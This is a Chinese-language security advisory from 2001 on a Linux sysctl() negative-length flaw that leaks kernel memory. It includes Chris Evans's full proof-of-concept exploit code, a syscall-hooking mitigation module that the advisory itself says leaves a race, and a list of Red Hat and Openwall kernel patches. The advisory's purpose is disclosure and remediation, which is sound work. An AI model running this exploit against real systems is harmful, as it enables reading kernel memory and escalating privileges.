Linux sysctl() 存在内核内存可读漏洞
发布时间:2001-02-16 更新时间:2001-02-16 严重程度:高 威胁程度:权限提升 错误类型:设计错误 利用方式:服务器模式
受影响系统 受影响系统:
详细描述 Linux内核存在一个可能造成ROOT级危害的问题。sysctl()调用允许有特权的程序读写内核参数,但权限不足的程序也可以使用这个系统调用查询内核中的值。该系统调用接受有符号的值,且未检查其是否为负,因此调用者可以提供负值,去获取最开始内存以下的设置和内容。这会导致普通用户浏览内核空间地址中的内容,或者提升权限。
测试代码 /* sysctl_exp.c - Chris Evans - February 9, 2001 */ /* Excuse the lack of error checking */ #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/mman.h> #include <unistd.h> #include <linux/unistd.h> #include <linux/sysctl.h> _syscall1(int, _sysctl, struct __sysctl_args *, args); #define BUFLEN 1000000 int main(int argc, const char* argv[]) { struct __sysctl_args args_of_great_doom; int names[2] = { CTL_KERN, KERN_NODENAME }; /* Minus 2 billion - somewhere close to biggest negative int */ int dodgy_len = -2000000000; int fd; char* p_buf; fd = open("/dev/zero", O_RDWR); p_buf = mmap((void*)8192, BUFLEN, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE, fd, 0); memset(p_buf, '\0', BUFLEN); fd = open("before", O_CREAT | O_TRUNC | O_WRONLY, 0777); write(fd, p_buf, BUFLEN); args_of_great_doom.name = names; args_of_great_doom.nlen = 2; args_of_great_doom.oldval = p_buf; args_of_great_doom.oldlenp = &dodgy_len; args_of_great_doom.newval = 0; args_of_great_doom.newlen = 0; _sysctl(&args_of_great_doom); fd = open("after", O_CREAT | O_TRUNC | O_WRONLY, 0777); write(fd, p_buf, BUFLEN); }
解决方案
解决方法: 升级程序:
下面的内核模块由Stephen White <swhite@ox.compsoc.net>提供。注意:该模块只是临时缓解措施——validate_sysctl()检查的是从用户空间复制出的参数副本,随后仍把原始用户指针args交给原有的sysctl处理函数重新读取,检查与使用之间参数仍可能被共享同一地址空间的其他线程改动;应优先升级到下文列出的已修复内核。
/* Stephen White 10/2/2001 swhite@ox.compsoc.net sysctl_fix.c, compile: gcc -Wall -DMODULE -D__KERNEL__ -c sysctl_fix.c (on Redhat/UltraSparc with sparc64-linux-gcc -m64 -mno-fpu -mcmodel=medlow -mcpu=ultrasparc -ffixed-g4 -fcall-used-g5 -fcall-used-g7 -Wall -DMODULE -D__KERNEL__ -c sysctl_fix.c ) Prevent sysctl exploit discovered by Chris Evans by properly validating input against negative numbers, */ #include <linux/kernel.h> #include <linux/config.h> #include <linux/module.h> #include <linux/version.h> #include <linux/types.h> #include
<linux/errno.h> #include <linux/sched.h> #include <sys/syscall.h> #include <linux/linkage.h> #include <asm/uaccess.h> #include <linux/sysctl.h> extern void *sys_call_table[]; int (*old_sysctl)(struct __sysctl_args *args); asmlinkage int validate_sysctl(struct __sysctl_args *args) { struct __sysctl_args tmp; if(copy_from_user(&tmp, args, sizeof(tmp))) return -EFAULT; if (tmp.nlen < 0) goto bad; if (tmp.oldval) { int old_len; if (copy_from_user(&old_len, tmp.oldlenp, sizeof(old_len))) return -EFAULT; if (old_len < 0) goto bad; } if (tmp.newval) if (tmp.newlen < 0) goto bad; return (*old_sysctl)(args); bad: printk("sysctl: arguments failed sanity check for user %i\n",current->uid); return -EINVAL; } int init_module() { old_sysctl = sys_call_table[__NR__sysctl]; sys_call_table[__NR__sysctl] = validate_sysctl; return 0; } void cleanup_module() { sys_call_table[__NR__sysctl] = old_sysctl; } 另外存在升级程序: Linux kernel 2.2.18 and previous: Red Hat Inc. RPM 6.x sparc kernel-smp-2.2.17-14.sparc64.rpm ftp://updates.redhat.com/6.2/sparc64/kernel-smp-2.2.17-14.sparc64.rpm Red Hat Inc. RPM 6.x i586 kernel-2.2.17-14.i586.rpm ftp://updates.redhat.com/6.2/i586/kernel-2.2.17-14.i586.rpm Red Hat Inc. RPM 7.0 alpha kernel-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 i386 kernel-pcmcia-cs-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-pcmcia-cs-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x alpha kernel-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-BOOT-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-BOOT-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-doc-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-doc-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-enterprise-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-enterprise-2.2.17-14.alpha.rpm Red Hat Inc. 
RPM 6.x alpha kernel-headers-2.2.16-3.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-headers-2.2.16-3.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-smp-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-smp-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-source-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-source-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x alpha kernel-utils-2.2.17-14.alpha.rpm ftp://updates.redhat.com/6.2/alpha/kernel-utils-2.2.17-14.alpha.rpm Red Hat Inc. RPM 6.x i386 kernel-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-BOOT-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-BOOT-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-doc-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-doc-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-headers-2.2.16-3.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-headers-2.2.16-3.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-ibcs-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-ibcs-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-pcmcia-cs-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-pcmcia-cs-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-smp-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-smp-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-source-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-source-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i386 kernel-utils-2.2.17-14.i386.rpm ftp://updates.redhat.com/6.2/i386/kernel-utils-2.2.17-14.i386.rpm Red Hat Inc. RPM 6.x i586 kernel-smp-2.2.17-14.i586.rpm ftp://updates.redhat.com/6.2/i586/kernel-smp-2.2.17-14.i586.rpm Red Hat Inc. RPM 6.x i686 kernel-2.2.17-14.i686.rpm ftp://updates.redhat.com/6.2/i686/kernel-2.2.17-14.i686.rpm Red Hat Inc. RPM 6.x i686 kernel-enterprise-2.2.17-14.i686.rpm ftp://updates.redhat.com/6.2/i686/kernel-enterprise-2.2.17-14.i686.rpm Red Hat Inc. 
RPM 6.x i686 kernel-smp-2.2.17-14.i686.rpm ftp://updates.redhat.com/6.2/i686/kernel-smp-2.2.17-14.i686.rpm Red Hat Inc. RPM 6.x sparc kernel-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-BOOT-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-BOOT-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-BOOT-2.2.17-14.sparc64.rpm ftp://updates.redhat.com/6.2/sparc64/kernel-BOOT-2.2.17-14.sparc64.rpm Red Hat Inc. RPM 6.x sparc kernel-doc-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-doc-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-enterprise-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-enterprise-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-enterprise-2.2.17-14.sparc64.rpm ftp://updates.redhat.com/6.2/sparc64/kernel-enterprise-2.2.17-14.sparc64.rpm Red Hat Inc. RPM 6.x sparc kernel-headers-2.2.16-3.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-headers-2.2.16-3.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-smp-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-smp-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-source-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-source-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc kernel-utils-2.2.17-14.sparc.rpm ftp://updates.redhat.com/6.2/sparc/kernel-utils-2.2.17-14.sparc.rpm Red Hat Inc. RPM 6.x sparc64 kernel-2.2.17-14.sparc64.rpm ftp://updates.redhat.com/6.2/sparc64/kernel-2.2.17-14.sparc64.rpm Red Hat Inc. RPM 7.0 alpha kernel-BOOT-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-BOOT-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 alpha kernel-doc-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-doc-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 alpha kernel-enterprise-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-enterprise-2.2.17-14.alpha.rpm Red Hat Inc. 
RPM 7.0 alpha kernel-smp-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-smp-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 alpha kernel-source-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-source-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 alpha kernel-utils-2.2.17-14.alpha.rpm ftp://updates.redhat.com/7.0/alpha/kernel-utils-2.2.17-14.alpha.rpm Red Hat Inc. RPM 7.0 i386 kernel-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-BOOT-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-BOOT-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-doc-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-doc-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-ibcs-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-ibcs-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-smp-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-smp-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-source-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-source-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i386 kernel-utils-2.2.17-14.i386.rpm ftp://updates.redhat.com/7.0/i386/kernel-utils-2.2.17-14.i386.rpm Red Hat Inc. RPM 7.0 i586 kernel-2.2.17-14.i586.rpm ftp://updates.redhat.com/7.0/i586/kernel-2.2.17-14.i586.rpm Red Hat Inc. RPM 7.0 i586 kernel-smp-2.2.17-14.i586.rpm ftp://updates.redhat.com/7.0/i586/kernel-smp-2.2.17-14.i586.rpm Red Hat Inc. RPM 7.0 i686 kernel-2.2.17-14.i686.rpm ftp://updates.redhat.com/7.0/i686/kernel-2.2.17-14.i686.rpm Red Hat Inc. RPM 7.0 i686 kernel-enterprise-2.2.17-14.i686.rpm ftp://updates.redhat.com/7.0/i686/kernel-enterprise-2.2.17-14.i686.rpm Red Hat Inc. RPM 7.0 i686 kernel-smp-2.2.17-14.i686.rpm ftp://updates.redhat.com/7.0/i686/kernel-smp-2.2.17-14.i686.rpm Solar Designer patch 2.2.18-ow4 http://www.openwall.com/linux/ Solar Designer patch 2.0.39-ow2 http://www.openwall.com/linux/ 相关信息 |